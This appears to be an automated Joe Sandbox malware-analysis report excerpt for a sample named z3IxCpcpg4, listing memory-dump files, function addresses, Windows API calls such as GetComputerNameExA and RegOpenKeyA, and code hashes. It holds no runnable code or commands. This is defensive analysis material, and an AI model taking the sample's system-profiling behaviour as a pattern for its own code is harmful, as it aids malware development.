Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2cc478cbe4fc03dc1d32f15b288cc04b9d29875d53e1bab206973dd4bee5a0f
Instruction ID: 5b4d3fc152aaa8cfaee748835e150c583beccb45f493a375c47e27d155a115d3
Opcode Fuzzy Hash: f2cc478cbe4fc03dc1d32f15b288cc04b9d29875d53e1bab206973dd4bee5a0f
Instruction Fuzzy Hash: E3513876E083054BD728AF28CC4162FB7D2ABD5730F19897CE8C9A7391E6319C41ABC5

Function 00F0CC7A Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: bb9281190a5db7610def46aa7a430d25444585e9b4208a0ca7c71a855fda4207
Instruction ID: c775bddee9db7e5995fc919c6db1455324abeb63cadeb37cf651177fa839566c
Opcode Fuzzy Hash: bb9281190a5db7610def46aa7a430d25444585e9b4208a0ca7c71a855fda4207
Instruction Fuzzy Hash: 66311AEAB406445BE505B6213C63A7F35674BD0718F081028F84B2B3C3EDADF91AB5A7

Function 00F2D7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00F2D898
GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00F2DC43

Strings

;87>, xrefs: 00F2DBEB

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: ;87>
API String ID: 2904949787-2104535307
Opcode ID: c9b0e6fceed1bc677c80cd4c53523decf266964190277dd9de01ea25138d7d53
Instruction ID: b9ad921cf1a2deea1626ca0c2eddc99f6dc20087a72779d9074daaaea618f25f
Opcode Fuzzy Hash: c9b0e6fceed1bc677c80cd4c53523decf266964190277dd9de01ea25138d7d53
Instruction Fuzzy Hash: 93216771404392CFDB228F34E850766BFE1EF5B311F288698D4C28B392DB389842EB11

Function 00F2D893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00F2D898
GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00F2DC43

Strings

;87>, xrefs: 00F2DBEB

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: ;87>
API String ID: 2904949787-2104535307
Opcode ID: b6b90926a6af3c909e59e82817672e017105302ff55b9a25650cc8368065bce4
Instruction ID: d7c90b82621b5ea5783b99e23fffe855f84123a77040f3d6ceb169019dfaf5e7
Opcode Fuzzy Hash: b6b90926a6af3c909e59e82817672e017105302ff55b9a25650cc8368065bce4
Instruction Fuzzy Hash: 81112BB1501602CFD7118F34EC5072ABBE2FF5B311F19C694D4968B392EB349842EB50

Function 05E7A4DF Relevance: 4.6, APIs: 3, Instructions: 96
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05E7A521
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 05E7A548
GetNativeSystemInfo.KERNEL32(?), ref: 05E7A59F

Memory Dump Source

Source File: 00000000.00000002.2571311166.0000000005E72000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: true

Associated: 00000000.00000002.2571213624.0000000005CE0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571237429.0000000005CE2000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571276004.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005CEA000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F80000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F8E000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2571311166.0000000005F90000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ce0000_z3IxCpcpg4.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: 922a0cb55ca8ed3e909092f7111e8a3a41121be9a7fae2ad6854c99c1942235e
Instruction ID: 41968efea95324467a715150918128ba8c3c364bcf3e01f32e5ea5a0210a1766
Opcode Fuzzy Hash: 922a0cb55ca8ed3e909092f7111e8a3a41121be9a7fae2ad6854c99c1942235e
Instruction Fuzzy Hash: 18419EB241421EAFEF11DF24C848BEE3AA9FB05315F004626ED81C6980E7765CA4CF9D

Function 00F09D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000), ref: 00F09D98
LoadLibraryExW.KERNEL32(?,00000000), ref: 00F09E78

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9ec5fdf02b811101790ea758c6a793a5e5375bea3d35dae1fe04c1d6eb7816c3
Instruction ID: 21c7d8f5523e346175c30f69851caeacc0ccd68f36b56e4dd3f3e3485693b271
Opcode Fuzzy Hash: 9ec5fdf02b811101790ea758c6a793a5e5375bea3d35dae1fe04c1d6eb7816c3
Instruction Fuzzy Hash: E6410174D003009FE7149F7899D2A9A7F71EB06324F51429CD8902F3E6C631980ADBE2

Function 00F0EF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00F0F09C

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
